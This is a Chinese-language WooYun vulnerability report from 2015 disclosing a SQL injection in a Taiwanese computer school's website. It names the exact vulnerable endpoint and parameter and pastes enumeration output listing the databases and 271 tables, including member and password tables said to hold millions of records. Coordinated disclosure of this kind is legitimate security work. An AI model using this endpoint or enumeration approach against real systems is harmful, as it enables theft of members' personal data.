当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126993

漏洞标题:台湾巨匠电脑sql注入一枚

相关厂商:巨匠電腦

漏洞作者: 骸骸

提交时间:2015-07-15 18:43

修复时间:2015-08-31 12:40

公开时间:2015-08-31 12:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

无聊扫扫目录,发现有个sql注入,应该可以把几万个会员资料脱出

详细说明:

http://www.pcschool.com.tw/activity/phone/Yahoo_Tcode.asp?pno=


MSSQL2008 2003系统。
available databases [13]:
[*] gjunappdb
[*] Hits
[*] lumigent
[*] master
[*] medialand
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebAnalytics
[*] webdb
[*] wwwdb //当前数据库
Database: wwwdb
[271 tables]
+------------------------------------------------+
| dbo.104_depno |
| dbo.104_group |
| dbo.104_item |
| dbo.104mapping |
| dbo.104mapping2 |
| dbo.Act_info |
| dbo.Act_namelist |
| dbo.Banners_content |
| dbo.Blacklist |
| dbo.Blacklist_log |
| dbo.ContactLog |
| dbo.ContactTime |
| dbo.ContactTime_WX |
| dbo.DataImport_D |
| dbo.DataImport_M |
| dbo.DeptInCity |
| dbo.DeptInCity_Group |
| dbo.EBook_Info |
| dbo.ERROR_LOG |
| dbo.Edm_Class |
| dbo.Edm_Signup |
| dbo.FunV2 |
| dbo.GjWebService_Log |
| dbo.Group_relation |
| dbo.Last_Contact_User |
| dbo.Login_log |
| dbo.Mail_Report_01 |
| dbo.Mail_Report_02 |
| dbo.Manage |
| dbo.Member_Purchase_D |
| dbo.NameList_Data |
| dbo.NameList_Rpt_B |
| dbo.Namelist_104_log |
| dbo.Namelist_CID_REC |
| dbo.Namelist_Dept_Cnt |
| dbo.Namelist_Holiday |
| dbo.Namelist_Purchase |
| dbo.Namelist_Purchase_Back |
| dbo.Namelist_ReAssign |
| dbo.Namelist_Sch |
| dbo.Namelist_Sch_Log |
| dbo.Namelist_TICKET |
| dbo.Namelist_shift |
| dbo.Namelist_shift_log |
| dbo.PcSchool |
| dbo.Personally_Goal |
| dbo.Recommend |
| dbo.Reservation |
| dbo.Reservation_log |
| dbo.TData |
| dbo.TVote |
| dbo.Telsales_Reward |
| dbo.Ter_Info |
| dbo.Ter_Info_D |
| dbo.V_CLASS_LVL |
| dbo.V_Class_Dept |
| dbo.V_DeptgGroup |
| dbo.V_EXAM |
| dbo.V_Purchase |
| dbo.V_Sys_Org |
| dbo.View_Bas_Areas |
| dbo.View_Bas_City |
| dbo.View_Board_List |
| dbo.View_Board_Reply_List |
| dbo.View_Board_Subject_List |
| dbo.View_Counsel_Subject_Question_List |
| dbo.View_Cousel_Subject_QuestReply_List |
| dbo.View_Lv1_Mapping |
| dbo.View_Lv2_Mapping |
| dbo.View_MEDIA_Info |
| dbo.View_PnoType |
| dbo.View_Pno_Info |
| dbo.View_WebFromtoGp |
| dbo.View_WebPnoGp |
| dbo.View_employee |
| dbo.View_media_cost |
| dbo.View_pcs_ter01 |
| dbo.View_seminar_01 |
| dbo.View_seminar_14 |
| dbo.View_wo_Counsel_Subject_List |
| dbo.View_wo_Counsel_Subject_List_Elite |
| dbo.View_wo_Counsel_Subject_Personal_List |
| dbo.View_wo_Counsel_Subject_Question_Elite_qty |
| dbo.View_wo_Department_List |
| dbo.View_wo_Teacher_List |
| dbo.WEBVIEW |
| dbo.WEB_BOOKING_MASTER |
| dbo.WEB_BOOKING_MASTER1 |
| dbo.WEB_CAMPUS |
| dbo.WEB_CAMPUS_SOB02 |
| dbo.WEB_CERT_CLASS_SOB2 |
| dbo.WEB_CLASS_DETAIL |
| dbo.WEB_CLASS_DETAIL1 |
| dbo.WEB_CLASS_MASTER |
| dbo.WEB_CLASS_PERIOD |
| dbo.WEB_COMPO_CALSS_SOB2 |
| dbo.WEB_COURSE_MASTER |
| dbo.WEB_COURSE_TEXTBOOK |
| dbo.WEB_DEPT |
| dbo.WEB_GUEST_YM |
| dbo.WEB_ITEM_HEADER |
| dbo.WEB_LICENSE_CLASS |
| dbo.WEB_MATERIAL |
| dbo.WEB_MIX_UNIT |
| dbo.WEB_ROLL_CALL |
| dbo.WEB_ROLL_CALL1 |
| dbo.WEB_SEMINAR |
| dbo.WEB_SEMINAR_CLASS |
| dbo.WEB_SOB1 |
| dbo.WEB_SOB2 |
| dbo.WEB_SOB3 |
| dbo.WEB_SOFTWARE |
| dbo.WEB_SOFTWARE_FACID |
| dbo.WEB_TER_EXPER |
| dbo.WEB_TER_INFO |
| dbo.WEB_TER_LEVEL |
| dbo.WEB_TER_LICENSE |
| dbo.WEB_TER_PROFILE |
| dbo.WEB_TER_SKILL |
| dbo.WEB_TER_TAG |
| dbo.WEB_TER_WRITING |
| dbo.W_CLASS |
| dbo.W_CLASS_APPLY |
| dbo.W_CLASS_DEPT |
| dbo.W_CLASS_DETAIL |
| dbo.W_CLASS_GEXAM |
| dbo.W_CLASS_INTRO |
| dbo.W_CLASS_LEVEL1 |
| dbo.W_CLASS_LEVEL2 |
| dbo.W_CLASS_LEVEL3 |
| dbo.W_CLASS_LV1 |
| dbo.W_CLASS_LV2 |
| dbo.W_CLASS_LV3 |
| dbo.W_CLASS_MATERIAL |
| dbo.W_CLASS_PERIOD |
| dbo.W_CLASS_PEXAM |
| dbo.W_CLASS_SERIES |
| dbo.W_CLASS_TEST |
| dbo.W_CLASS_TICKET |
| dbo.W_CLASS_TYPE |
| dbo.W_Class_Cert |
| dbo.W_Code_D |
| dbo.W_Code_M |
| dbo.W_DEPT |
| dbo.W_DESIGNAWARD_GUEST |
| dbo.W_DESIGNAWARD_WORK |
| dbo.W_DownLoadEbookLog |
| dbo.W_DownLoadEbookStr |
| dbo.W_FIRST_MEMBER |
| dbo.W_GJUN_EVENT |
| dbo.W_GJUN_HOPE |
| dbo.W_GJUN_HOT |
| dbo.W_GJUN_STORY |
| dbo.W_ITonline |
| dbo.W_MATERIAL |
| dbo.W_MEDIABANNER_ACTIVITY |
| dbo.W_MEDIABANNER_COST |
| dbo.W_MEDIABANNER_INFO |
| dbo.W_MEDIAKEYWORD_INFO |
| dbo.W_MEDIA_ABINFO |
| dbo.W_MEDIA_INFO |
| dbo.W_MEMBER |
| dbo.W_MEMBERCARD_DETAIL |
| dbo.W_MEMBERCARD_MASTER |
| dbo.W_MEMBERCLASS_TICKET |
| dbo.W_MEMBER_EDUCATION |
| dbo.W_MEMBER_GIFT |
| dbo.W_MEMBER_IDENTITY |
| dbo.W_MEMBER_IDENTITYRESERVE |
| dbo.W_MEMBER_LOG |
| dbo.W_MEMBER_PRESENT |
| dbo.W_MEMBER_PWD |
| dbo.W_MEMBER_TICKET |
| dbo.W_MEMBER_VIEW |
| dbo.W_MIX_CLASS_DETAIL |
| dbo.W_PERSON_TARGET |
| dbo.W_PROD |
| dbo.W_PURCHASE_DETAIL |
| dbo.W_PURCHASE_MASTER |
| dbo.W_SEMINAR |
| dbo.W_SEMINAR_CLASS |
| dbo.W_SEMINAR_PLAN |
| dbo.W_SEMINAR_PLAN_CLASS |
| dbo.W_SEMINAR_PLAN_DEPT |
| dbo.W_SEMINAR_REG |
| dbo.W_SOFTWARE |
| dbo.W_SOFTWARE_CMP |
| dbo.W_TER_INFO |
| dbo.W_Tcode_Log |
| dbo.W_WEBORDER |
| dbo.W_WEB_GUEST |
| dbo.W_WEB_GUEST_DATA |
| dbo.W_WEB_GUEST_Temp |
| dbo.W_WIS_APPLY |
| dbo.Wx_Area_Cnt |
| dbo.Wx_Assign_Log |
| dbo.Wx_User_Info |
| dbo.Wx_User_Info_Log |
| dbo.Wx_city_Area |
| dbo.act_singup_type |
| dbo.app_random_code |
| dbo.course_LvMap |
| dbo.crstbcom |
| dbo.crstbitem |
| dbo.crstbitemdetail |
| dbo.crstbpsn |
| dbo.crstbsdl |
| dbo.crstbstd |
| dbo.dtproperties |
| dbo.e104_jobitem |
| dbo.e104classjob_mapping |
| dbo.epaper01 |
| dbo.epaper02 |
| dbo.epaper03 |
| dbo.epaper04 |
| dbo.epaper05 |
| dbo.epaper06 |
| dbo.epaper07 |
| dbo.exam_count |
| dbo.faq01 |
| dbo.faq02 |
| dbo.faq03 |
| dbo.faq04 |
| dbo.mem_ctrl |
| dbo.member_Belong |
| dbo.memberlog |
| dbo.message03 |
| dbo.message04 |
| dbo.message05 |
| dbo.message06 |
| dbo.namelist_Personally |
| dbo.namelist_TypeChg |
| dbo.namelist_dept_User |
| dbo.namelist_dept_User_log |
| dbo.namelist_rpt |
| dbo.online_black |
| dbo.online_talk |
| dbo.pcs_mem01 |
| dbo.poll_std_01 |
| dbo.poll_std_02 |
| dbo.poll_std_05 |
| dbo.poll_std_ter |
| dbo.rec_namelist |
| dbo.sys_org |
| dbo.teacher_blacklist |
| dbo.teacher_login |
| dbo.users_tel |
| dbo.w_data_EpaperClicks |
| dbo.w_data_InviteMembers |
| dbo.w_data_Members |
| dbo.w_data_Staffs |
| dbo.w_dept_imgs |
| dbo.web_commend |
| dbo.wo_Board |
| dbo.wo_Board_Reply |
| dbo.wo_Board_Subject |
| dbo.wo_Board_Subject_Log |
| dbo.wo_Counsel_Subject |
| dbo.wo_Counsel_Subject_Join |
| dbo.wo_Counsel_Subject_QuestReply |
| dbo.wo_Counsel_Subject_Question |
| dbo.wo_Counsel_Subject_Question_Log |
| dbo.wo_Counsel_Subject_Question_R |
| dbo.wo_Counsel_Subject_Vote |
| dbo.wo_Course |
| dbo.wo_Department |
| dbo.wo_Marquee |
| dbo.wo_ReplyCane |
| dbo.wo_Report |
| dbo.wo_Teacher |
| dbo.wo_subject_mapping |
+------------------------------------------------+
我随便挑个敏感的表来脱,像是member
其中一个数据量记录就有 1/8821050
太多东西,就不继续跑了

漏洞证明:

见说明!

修复方案:

过滤

版权声明:转载请注明来源 骸骸@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-17 12:38

厂商回复:

感謝通報!!

最新状态:

暂无


漏洞评价:

评论